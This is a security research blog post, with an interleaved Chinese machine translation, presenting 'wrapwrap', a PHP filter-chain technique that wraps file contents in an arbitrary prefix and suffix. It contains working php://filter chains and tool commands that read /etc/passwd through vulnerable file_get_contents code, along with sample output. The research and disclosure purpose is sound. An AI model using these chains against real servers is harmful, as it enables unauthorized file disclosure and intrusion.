Abstract 抽象
wrapwrap
marks another improvement to the PHP filter exploitation saga. Adding arbitrary prefixes to resources using php://filter
is nice, but you can now add an arbitrary suffix as well, allowing you to wrap PHP resources into any structure. This beats code like:
wrapwrap
标志着对 PHP 过滤器利用传奇的又一次改进。使用 向 php://filter
资源添加任意前缀是很好的,但您现在也可以添加任意后缀,从而允许您将 PHP 资源包装到任何结构中。这击败了以下代码:
$data = file_get_contents($_POST['url']);
$data = json_decode($data);
echo $data->message;
or:
$config = parse_ini_file($_POST['config']);
echo $config["config_value"];
wrapwrap
is available on our GitHub repository.
wrapwrap
可在我们的 GitHub 存储库中找到。
Introduction 介绍
A few months ago, we encountered a WordPress plugin that read an arbitrary file and parsed its XML to extract a value. The code looked like this:
几个月前,我们遇到了一个 WordPress 插件,它读取任意文件并解析其 XML 以提取值。代码如下所示:
# Load an arbitrary resource
$xml = file_get_contents($_POST['url']);
# Parse the XML into the $tags structure
$parser = xml_parser_create();
xml_parser_set_option($parser, XML_OPTION_CASE_FOLDING, false); # Case-sensitivity ON
xml_parse_into_struct($parser, $xml, $tags, $index);
xml_parser_free($parser);
# Extract the value of the <name> tag
foreach($tags as $tag) {
if($tag['tag'] == 'name') {
$product_name = $tag['value'];
break;
}
}
# Display product name
if(isset($product_name)) {
echo "Product name: " . htmlentities($product_name);
}
If url
pointed to a file that contained <product><name>PRODUCT123</name><price>123</price></product>
, the page displayed: Product name: PRODUCT123
.
如果 url
指向包含 <product><name>PRODUCT123</name><price>123</price></product>
的文件,则页面将显示: Product name: PRODUCT123
。
By providing an HTTP URL, like http://localhost/something
, we could reach an internal service, but we wouldn’t be able to see the HTTP response, because the code would parse it as XML, and only display the value of the <name>
tag. This also prevented us from reading local files, or any PHP resource. A standard solution was to use XXE, but external entities were disabled.
通过提供 HTTP URL,例如 http://localhost/something
,我们可以访问内部服务,但我们无法看到 HTTP 响应,因为代码会将其解析为 XML,并且仅显示 <name>
标记的值。这也阻止了我们读取本地文件或任何 PHP 资源。标准解决方案是使用 XXE,但禁用了外部实体。
We seemed to be stuck with a blind SSRF.
我们似乎陷入了盲目的SSRF中。
There was however an additional bug: the return code of the xml_parse_into_struct()
function was not checked. Therefore, if we submitted a file like <product><name>PRODUCT123
, we would still get Product name: PRODUCT123
, because the function fills the $tags
array as it parses the XML, and does not clear it if an error happens.
然而,还有一个额外的错误: xml_parse_into_struct()
没有检查函数的返回代码。因此,如果我们提交一个像这样的 <product><name>PRODUCT123
文件,我们仍然会得到 Product name: PRODUCT123
,因为该函数在解析 XML 时会填充 $tags
数组,并且在发生错误时不会清除它。
This oversight was actually enough to transform the SSRF into an in-band (i.e. non-blind) one using PHP filters. Indeed, in 2022, @remsio released a tool to generate arbitrary file from void, based on charset conversions.
这种疏忽实际上足以使用 PHP 过滤器将 SSRF 转换为带内(即非盲)的 SSRF。事实上,在 2022 年,@remsio发布了一个工具,可以基于字符集转换从 void 生成任意文件。
If you are unfamiliar with the technique, we’ll briefly cover it right after. Additionally, his blogpost and the CTF writeup that inspired the tool, from loknop are both excellent resources.
如果您不熟悉该技术,我们将在之后简要介绍它。此外,他的博客文章和启发该工具的 CTF 文章(来自 loknop)都是极好的资源。
The technique works by incrementally adding base64 characters to a pre-existing content by playing with charset conversions, and then B64-decoding it to obtain arbitrary contents. It is generally used to generate a webshell, but in our case it has another use: we can make the tool append the <product><name>
prefix to any resource, and get the WordPress plugin to display file contents!
该技术的工作原理是通过玩字符集转换将 base64 字符增量添加到预先存在的内容中,然后对其进行 B64 解码以获得任意内容。它通常用于生成 webshell,但在我们的例子中它还有另一个用途:我们可以让工具将 <product><name>
前缀附加到任何资源,并获取 WordPress 插件来显示文件内容!
After a few tweaks on the original script, we had it working:
在对原始脚本进行了一些调整后,我们让它正常工作:
$ ./php_filter_chain_generator.py --chain '<product><name>' --file='/etc/passwd'
[+] The following gadget chain will generate the following code : <product><name> (base64 value: PHByb2R1Y3Q+PG5hbWU+)
php://filter/convert.base64-encode|...|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|...|/resource=/etc/passwd
Which gives: 这给出了:
php> echo file_get_contents('php://filter/convert.base64-encode|...|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|...|/resource=/etc/passwd');
<product><name>cm9vdDp4OjA6MDpyb290Oi9... # b64 of /etc/passwd
We could now load any resource and make the PHP script display it!
我们现在可以加载任何资源并让 PHP 脚本显示它!
This however begged the question: what would have happened if the developer checked for the return code of the xml_parse_into_struct()
function? In other words, what if we needed to provide valid XML? Or, what if the code used json_decode()
instead?
然而,这就引出了一个问题:如果开发人员检查 xml_parse_into_struct()
函数的返回代码会发生什么?换句话说,如果我们需要提供有效的 XML,该怎么办?或者,如果改用 json_decode()
代码呢?
Well, turns out you can actually use an oracle, which makes use of the limited PHP memory, to dump the file character by character. Check this CTF solution, or remsio’s tool here. This approach has, however, downsides: it is slow, does not allow you to dump big files, and is very hard on the server, as it’ll try to allocate huge memory regions before erroring out, on each test.
好吧,事实证明,您实际上可以使用预言机,它利用有限的PHP内存,逐个字符转储文件。在此处查看此 CTF 解决方案或 remsio 的工具。然而,这种方法也有缺点:它很慢,不允许你转储大文件,而且在服务器上非常困难,因为它会在每次测试出错之前尝试分配巨大的内存区域。
Unsatisfied with the current state of the art, we started working on a solution: a way to add, in addition to an arbitrary prefix, an arbitrary suffix to any resource. This yielded a new tool, wrapwrap, available on our Github.
由于对当前技术水平不满意,我们开始研究解决方案:一种除了任意前缀之外,还可以向任何资源添加任意后缀的方法。这产生了一个新工具,wrapwrap,可以在我们的 Github 上找到。
php> echo file_get_contents('php://filter/.../resource=/etc/passwd');
<product><name>root:x:0:0:root:/root:/bin/bash=0Adaemon...</name></product>
Building wrapwrap 建筑围膜
In this section, we’ll describe the various approaches used to find the primitives that allowed to build the tool. For the sake of simplicity, we will refer to the contents of the resource provided to the filter chain (i.e. the value returned by the resource
in php://filter/.../resource=
) as the file contents, although the resource can be anything (http://
, ftp://
, etc.). Additionally, we’ll refer to the base64 of such file contents as the original base64.
在本节中,我们将介绍用于查找允许构建工具的基元的各种方法。为了简单起见,我们将提供给过滤器链的资源内容(即 resource
in php://filter/.../resource=
返回的值)称为文件内容,尽管资源可以是任何东西( , http://
, ftp://
等)。此外,我们将此类文件内容的 base64 称为原始 base64。
Adding a prefix 添加前缀
Let’s first understand the previous state of research, that is how you can add an arbitrary prefix to a resource using a filter chain. The idea is to work on the original base64, add a few chars, and then base64-decode it to have an arbitrary prefix in addition to the original file contents.
让我们首先了解一下之前的研究状态,即如何使用过滤器链向资源添加任意前缀。这个想法是在原始的 base64 上工作,添加一些字符,然后对其进行 base64 解码,使其除了原始文件内容之外还具有任意前缀。
@loknop explained it very well in his gist:
@loknop在他的要点中很好地解释了这一点:
For instance, convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode
will add a K
to your B64:
例如, convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode
将添加到 K
您的 B64:
php> echo file_get_contents('php://filter/convert.base64-encode/resource=/etc/passwd');
cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYm...
php> echo file_get_contents('php://filter/convert.base64-encode|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode/resource=/etc/passwd');
Kcm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYm...
Now, how do you compute filter chain that yields a K
, or any other base64 digit? @loknop (and later @remsio) used a combination of bruteforce and manual testing to do so, which apparently took days.
现在,如何计算产生 K
或任何其他 base64 数字的滤波器链?@loknop(以及后来的@remsio)使用了暴力破解和手动测试的组合来做到这一点,这显然需要几天时间。
We’ll call the filter chains that generate a base64 digit a digit-chain. Here are a few digit-chains:
我们将生成 base64 数字的过滤器链称为数字链。以下是一些数字链:
C: convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode
C: convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode
D: convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode
d: convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode
Now that this is out of the way, let’s focus on adding a suffix to some base64.
现在已经不碍事了,让我们专注于为一些 base64 添加后缀。
Fuzzing to no effect 模糊测试无效
We could apply the same strategy as for the prefix, and use bruteforce to find PHP filter chains that create suffixes. However, a few hours of fuzzing and thinking showed that it would probably not work. One of the reason is that although some charsets may add prefixes (for instance, convert.iconv.UTF8.CSISO2022KR
will always prepend \x1b$)C
), it wouldn’t make much sense to add suffixes, as strings are parsed from left to right. Playing with the =
characters that pad base64 payloads proved ineffective as well.
我们可以应用与前缀相同的策略,并使用蛮力来查找创建后缀的 PHP 过滤器链。然而,几个小时的模糊和思考表明它可能不会奏效。原因之一是,尽管某些字符集可能会添加前缀(例如,将始终在前面), \x1b$)C
但添加后缀没有多大意义, convert.iconv.UTF8.CSISO2022KR
因为字符串是从左到右解析的。玩填充 base64 有效载荷 =
的角色也被证明是无效的。
We therefore dropped fuzzing and went back to a more analytical approach.
因此,我们放弃了模糊测试,转而采用更具分析性的方法。
Not so random trimming 不那么随意的修剪
When playing with the primitive that allows you to add a prefix, we realized that in some cases, the original string had its last characters removed. For instance, starting from the string HELLO!
, if we add a prefix that says HI!
:
在使用允许您添加前缀的原语时,我们意识到在某些情况下,原始字符串会删除其最后一个字符。例如,从字符串 HELLO!
开始,如果我们添加一个前缀,上面写着 HI!
:
php > echo file_get_contents('php://filter/convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode|/resource=data:,HELLO!');
HI!HEL
Why would this happen ? To understand it, we need a little bit of base64 theory.
为什么会这样?要理解它,我们需要一点 base64 理论。
Base64 stores 3 bytes over 4 B64-digits. Each digit encodes 6 bits of information. Therefore, a single digit is not enough to encode a byte. As a result, when base64-decoding 4n+1
digits, the first n
quartets each decode to 3 bytes, and the last digit, which cannot encode a whole byte by itself, gets ignored:
Base64 在 4 位 B64 位上存储 3 个字节。每个数字编码 6 位信息。因此,单个数字不足以对字节进行编码。因此,当 base64 4n+1
解码数字时,前 n
四重奏各自解码为 3 个字节,而最后一个数字(本身无法对整个字节进行编码)将被忽略:
php> echo base64_decode('SEVMTE8h');
HELLO!
php> echo base64_decode('SEVMTE8hX');
HELLO!
Now, since each digit-chain ends with convert.base64-decode|convert.base64-encode
(this is a way to remove characters that are not a base64 digit), if the original string has a size which is divisible by four, prepending a digit will also remove the last digit of the B64 string.
现在,由于每个数字链都以 convert.base64-decode|convert.base64-encode
(这是一种删除不是 base64 数字的字符的方法),如果原始字符串的大小可以被 4 整除,则在数字前面加上也将删除 B64 字符串的最后一位数字。
php> echo file_get_contents('php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode/resource=data:,12345678');
C1234567
This is what happens in our example: the original payload, HELLO!
, has a size of 6, so it’s base64 is properly aligned (with a size of 8). Each time we add a base64 digit, we remove the last digit of the base64.
这就是我们示例中发生的情况:原始有效负载 HELLO!
的大小为 6,因此它的 base64 正确对齐(大小为 8)。每次添加 base64 数字时,我们都会删除 base64 的最后一位数字。
This behaviour turned out to be a key element to wrapwrap
‘s algorithm.
这种行为被证明是 wrapwrap
算法的一个关键因素。
The main idea 主要思想
Since we cannot generate a suffix, the other option would be to generate a prefix and make it move to the end of the original string. How can we do this?
由于我们无法生成后缀,因此另一种选择是生成前缀并使其移动到原始字符串的末尾。我们怎样才能做到这一点?
In the error-based oracle technique, @hash_kitten cleverly uses charset conversions to swap characters around. For instance, converting from UCS-4
to UCS-4LE
takes quartets of 4 characters and inverts their order (ABCD
-> DCBA
).
在基于错误的预言机技术中,@hash_kitten巧妙地使用字符集转换来交换字符。例如,从 to UCS-4
UCS-4LE
转换需要 4 个字符的四重奏并颠倒它们的顺序 ( ABCD
-> DCBA
)。
Using this idea, and with the help of the previous 4n+1
technique, we can build a prefix and have it move from the beginning of the string to its ends. As an example, say that we want to set a suffix which consists of three letters (i.e. a triplet), XYZ
.
使用这个想法,并借助前面 4n+1
的技术,我们可以构建一个前缀,并让它从字符串的开头移动到它的结尾。例如,假设我们要设置一个由三个字母(即三元组)组成的后缀。 XYZ
First, we take some arbitrary file and convert it to base64.
首先,我们获取一些任意文件并将其转换为 base64。
Second, we pad the base64 payload such that its size is a multiple of 3 (It is not hard to convert a payload of any size to a valid size by using techniques which are not described in the article). For the sake of simplicity, we will say that the base64 is ABC
.
其次,我们填充 base64 有效负载,使其大小是 3 的倍数(使用本文未描述的技术将任何大小的有效负载转换为有效大小并不难)。为了简单起见,我们说 base64 是 ABC
.
Then, we create 3 NULL bytes in between each character by converting the payload from ASCII
to UCS-4
, which is a 4-byte character set.
然后,我们通过将有效负载从 ASCII
转换为 UCS-4
在每个字符之间创建 3 个 NULL 字节,这是一个 4 字节的字符集。
We base64-encode the payload. Since its size is divisible by 3, the result’s size is divisible by 4.
我们对有效负载进行 base64 编码。由于其大小可以被 3 整除,因此结果的大小可以被 4 整除。
The base64 of XYZ
is WFla
. Using digit-chains, we add a
, l
, F
, W
to the payload. Each time we add such a letter, and because the payload is 4-aligned, the last digit gets removed.
base64 的 XYZ
是 WFla
。使用数字链,我们将 、 a
、 l
F
W
添加到有效负载中。每次我们添加这样的字母时,由于有效载荷是 4 对齐的,最后一位数字都会被删除。
We end up having added 4 digits at the beginning of the payload, and removed 4 at the end.
我们最终在有效载荷的开头添加了 4 位数字,并在末尾删除了 4 位数字。
We then decode: 然后我们解码:
and finally, swap quartets using the UCS-4
to UCS-4LE
conversion:
最后,使用 UCS-4
to UCS-4LE
转换交换四重奏:
This isn’t much, but we managed to move XYZ
(albeit in the reverse order) after the first digit, A
. If we were to base64-decode and encode the result (which removes bytes that are not base64 digits), we’d have: AZYXBC
. If we keep an eye on the three NULL bytes that start on the right of A
during each step of the algorithm, we can see that they are now on the right of B
: they have “moved” forward 4 squares. So if we repeat the algorithm, this time with 3 NULL bytes (AAAA
in base64):
这并不多,但我们设法在 XYZ
第一个数字 A
.如果我们要对结果进行 base64 解码和编码(删除不是 base64 数字的字节),我们将得到: AZYXBC
.如果我们密切关注在算法的每个步骤中从右侧 A
开始的三个 NULL 字节,我们可以看到它们现在位于 B
: 它们已经向前“移动”了 4 个方格。因此,如果我们重复该算法,这次使用 3 个 NULL 字节( AAAA
在 base64 中):
The XYZ
part has moved forward again, and the other base64 digits have not moved.
该 XYZ
部分再次向前移动,其他 base64 数字没有移动。
If we push three NULL bytes again, we get:
如果我们再次推送三个 NULL 字节,我们会得到:
The YXZ
string has moved forward 3 times, passing A
, B
and C
, and, without altering the order of the other digits. By repeating this operation as many times as we need, we can push the XYZ
value to the end of the payload.
YXZ
字符串向前移动了 3 次,传递 A
了 、 B
和 C
,并且没有改变其他数字的顺序。通过根据需要多次重复此操作,我们可以将 XYZ
值推送到有效负载的末尾。
We can finally simply base64-decode, then base64-encode, to get rid of NULL bytes:
我们终于可以简单地进行 base64 解码,然后是 base64 编码,以摆脱 NULL 字节:
And we get what we wanted: ABCZXY
.
我们得到了我们想要的: ABCZXY
.
In this case, we added a XYZ
triplet, followed by two triplets of NULL bytes. We could have instead pushed XYZ
, then UVW
, then a NULL-triplet, and we’d have a final base64 string such as: ABUVWCZXY
.
在本例中,我们添加了一个 XYZ
三元组,后跟两个 NULL 字节的三元组。我们可以先按 ,然后按 ,然后 UVW
推 XYZ
一个 NULL 三元组,然后我们就会得到一个最终的 base64 字符串,例如: ABUVWCZXY
.
Therefore, the algorithm allows us to add triplets in between each digit of the original base64.
因此,该算法允许我们在原始 base64 的每个数字之间添加三元组。
Where is the end? 终点在哪里?
Although we can now “push” a triplet to the end of the original string, we do not know the size of said string. That is, we don’t know how much we need to repeat the algorithm before our suffix-to-be reaches the end of the string. Instead of finding a way to compute the size of the string, we chose to make use of another filter, dechunk
.
虽然我们现在可以将三元组“推”到原始字符串的末尾,但我们不知道该字符串的大小。也就是说,我们不知道在后缀到达字符串末尾之前需要重复多少算法。我们没有找到计算字符串大小的方法,而是选择使用另一个过滤器 dechunk
.
This filter dechunks data. For instance:
此筛选器对数据进行分块。例如:
5
Hello
7
there!
0
would become: 将变成:
Hello there!
The interesting fact about this filter is that when it reaches the <LF>0<LF>
, indicating the end of the chunk data, it silently discards what comes after. As a result, something like:
关于这个过滤器的有趣事实是,当它到达 <LF>0<LF>
时,指示块数据的末尾,它会静默地丢弃后面的内容。因此,类似于:
c
This is kept
0
This is not
is parsed as: 解析为:
This is kept
So, instead of precisely computing the size of the file we are dumping, we can push a <LF>0<LF>
triplet along:
因此,与其精确计算我们要转储的文件的大小,不如推动一个 <LF>0<LF>
三元组:
Add a proper chunk header at the beginning:
在开头添加适当的块头:
Then call the dechunk
filter:
然后调用 dechunk
过滤器:
And finally, base64-decode then encode to get rid of NULL bytes:
最后,base64-decode 然后进行编码以摆脱 NULL 字节:
We can now trim a resource to an arbitrary size, and add a triplet in between each letter of its contents.
现在,我们可以将资源修剪为任意大小,并在其内容的每个字母之间添加一个三元组。
Real suffix control: removing digits
真正的后缀控制:删除数字
In the current state of affairs, we can only insert triplets of arbitrary bytes in between each base64 character. Therefore, if the original base64 is ABCDEF
, we can only insert 3 bytes in between A
and B
, 3 between between B
and C
, etc. We could get ABCDXXXEYYYFZZZ
, but not ABCDEFXXXYYYZZZ
. We don’t control more than 3 consecutive bytes.
在目前的情况下,我们只能在每个 base64 字符之间插入任意字节的三元组。因此,如果原来的 base64 是 ABCDEF
,我们只能在 and 之间插入 3 个字节,在 and C
B
之间 B
A
插入 3 个字节,以此类推。我们可以得到 ,但不能 ABCDEFXXXYYYZZZ
。 ABCDXXXEYYYFZZZ
我们控制的连续字节不超过 3 个。
This is annoying. Going back to our very first example, we’d like our suffix to be </name></product>
, which clearly cannot be encoded via 3 base64 digits.
这很烦人。回到我们的第一个示例,我们希望我们的后缀是 </name></product>
,这显然不能通过 3 个 base64 数字进行编码。
A bad solution would be to add a triplet, push it to the end, and then do the entire algorithm again for another triplet, and then again for another one, etc. This would work, but would be extremely costly in terms of both size (the filter chains can become huge) and time (PHP takes a few seconds to process big filter chains).
一个糟糕的解决方案是添加一个三元组,将其推到最后,然后再次为另一个三元组执行整个算法,然后再次为另一个三元组执行整个算法,依此类推。这是可行的,但在尺寸(过滤器链可能会变得巨大)和时间(PHP 需要几秒钟来处理大型过滤器链)方面都非常昂贵。
This is thus not acceptable, especially since we are already able to add several triplets in one iteration of the algorithm, only separated by one digit every time…
因此,这是不可接受的,特别是因为我们已经能够在算法的一次迭代中添加多个三元组,每次只间隔一位数……
To see how we can solve this problem, let’s go back to theory again. In a D1D2D3D4 quartet of B64-digits, each digit Di encodes 6 bits. By decoding, we get 4×6=24 bits, thus 3 bytes B1B2B3. The last of these 3 bytes, B3, is encoded using the two least significant bits of D3 and the 6 bits of D4. As a result, if the 5th bit of D3 is set to 1, B3 will have its most significant bit set. It will therefore be out of ASCII range, regardless of the value of D4.
为了看看我们如何解决这个问题,让我们再次回到理论上来。在 B64 位的 D D D 3 D 四重奏中,每个数字 D 4 1 2 编码 6 位。通过解码,我们得到 4×6=24 位,因此 3 字节 B B 1 B 2 3 .这 3 个字节中的最后一个 B 3 使用 D 的两个最低有效位和 D 3 4 的 6 位进行编码。因此,如果 D 3 的 5 位设置为 1,则 B 3 将设置其最高有效 th 位。因此,无论 D 4 的值如何,它都将超出 ASCII 范围。
Now, say we insert a triplet T1T2T3 in front of a digit X, thus forming a quartet. When this gets decoded, if we set the second to last bit of T3 to 1, we know that the last byte of the decoded value will be out of ASCII range, whatever X may be.
现在,假设我们在数字 X 前面插入一个三元组 T T 2 T 3 1 ,从而形成一个四重奏。当它被解码时,如果我们将 T 3 的倒数第二位设置为 1,我们知道解码值的最后一个字节将超出 ASCII 范围,无论 X 是什么。
Therefore, if we base64-encode the original contents twice, we can then remove characters from the original base64 by making them decode to non-ASCII characters.
因此,如果我们对原始内容进行两次 base64 编码,那么我们可以通过将字符解码为非 ASCII 字符来从原始 base64 中删除字符。
As an example, say a file contains HELLO!
. The base64 of this is SEVMTE8h
, and its base64 is U0VWTVRFOGgK
.
例如,假设一个文件包含 HELLO!
.它的 base64 是 ,它的 base64 是 SEVMTE8h
U0VWTVRFOGgK
。
The first two quartets look like:
前两个四重奏看起来像:
If we insert a triplet T1T2T3 in front of the 5th letter T, and another U1U2U3 in front of the 6th letter V, we get:
如果我们在 5 th 个字母 T 前面插入一个三元组 T T 2 T 3 1 ,在 6 th 个字母 V 前面插入另一个 U U 1 2 U 3 ,我们得到:
As we can see, the decoded part for the first quartet does not change (U0VW
decodes to SEV
), but then the next quatuor decodes into two bytes of our choosing (encoded with T1, T2, and the first 4 bytes of T3), and a third byte which is not ASCII (because the two least significant bits of T3 are set). The information that was contained into T
is “discarded”. Same happens with U1U2U3 and V
.
正如我们所看到的,第一个四重奏的解码部分没有改变( U0VW
解码为 SEV
),但随后下一个四重奏解码为我们选择的两个字节(用 T , T 和 T 的前 4 个字节编码),以及第三个非 ASCII 字节(因为设置了 T 1 2 3 3 的两个最低有效位)。包含在中 T
的信息被“丢弃”。U U 1 2 U 3 和 V
.
Therefore, each triplet inserted in the second base64 allows us to encode 2 digits and get rid of 1 digit of the first base64, solving our problem. As an example, say we want to suffix SEV
by ABCD
. The first triplet encodes AB
using QUL
. The second encodes CD
as Q0T
.
因此,插入第二个 base64 中的每个三元组允许我们对 2 位数字进行编码并去除第一个 base64 的 1 位数字,从而解决了我们的问题。举个例子,假设我们想 SEV
以 为 ABCD
后缀。第一个三元组使用 QUL
进行编码 AB
。第二个编码 CD
为 Q0T
.
We get: U0VWQULTQ0TV
, which decodes to SEVAB�CD�
. If we base64-decode and encode, we get SEVABCD
.
我们得到: U0VWQULTQ0TV
,它解码为 SEVAB�CD�
.如果我们对 base64 进行解码和编码,我们得到 SEVABCD
.
We can now add a suffix of arbitrary size!
我们现在可以添加任意大小的后缀!
Using wrapwrap 使用换行
Say you have code like so:
假设你有这样的代码:
$data = file_get_contents($_POST['url']);
$data = json_decode($data);
echo $data->message;
To obtain the contents of some file, we’d like to have: {"message":"<file contents>"}
. This can be done using:
要获取某些文件的内容,我们希望有: {"message":"<file contents>"}
.这可以使用以下方法完成:
$ ./wrapwrap.py /etc/passwd '{"message":"' '"}' 1000
[*] Dumping 1008 bytes from /etc/passwd.
[+] Wrote filter chain to chain.txt (size=705031).
This yields: 这会产生:
{"message":"root:x:0:0:root:/root:/bin/bash=0Adaemon:..."}
Conclusion 结论
This is another improvement on the PHP filter attacks: we can now add a prefix and a suffix to any resource. Beware of the size of your payload, however: it gets pretty big, pretty fast. Dumping 3300 bytes from a file require a payload of 2 megabytes. Luckily, it should not be too much of a problem if the controlled URL is sent through POST.
这是对 PHP 过滤器攻击的另一项改进:我们现在可以为任何资源添加前缀和后缀。但是,要注意有效载荷的大小:它变得非常大,非常快。从文件中转储 3300 字节需要 2 MB 的有效负载。幸运的是,如果受控 URL 是通过 POST 发送的,这应该不会有太大的问题。
We deliberately left lots of details and optimisations out of the blog post to keep it concise. Don’t hesitate to read the code of wrapwrap if you want to know how it really works, and help improve it.
为了保持简洁,我们特意在博客文章中遗漏了许多细节和优化。如果您想了解 wrapwrap 的真正工作原理并帮助改进它,请不要犹豫,阅读 wrapwrap 的代码。
The GitHub repository is here.
GitHub 存储库位于此处。
We’re hiring! 我们正在招聘!
Ambionics is an entity of Lexfo, and we’re hiring! To learn more about job opportunities, do not hesitate to contact us at [email protected]. We’re a french-speaking company, so we expect candidates to be fluent in our beautiful language.
Ambionics 是 Lexfo 的一个实体,我们正在招聘!要了解有关工作机会的更多信息,请随时通过 [email protected] 与我们联系。我们是一家讲法语的公司,因此我们希望候选人能够流利地使用我们优美的语言。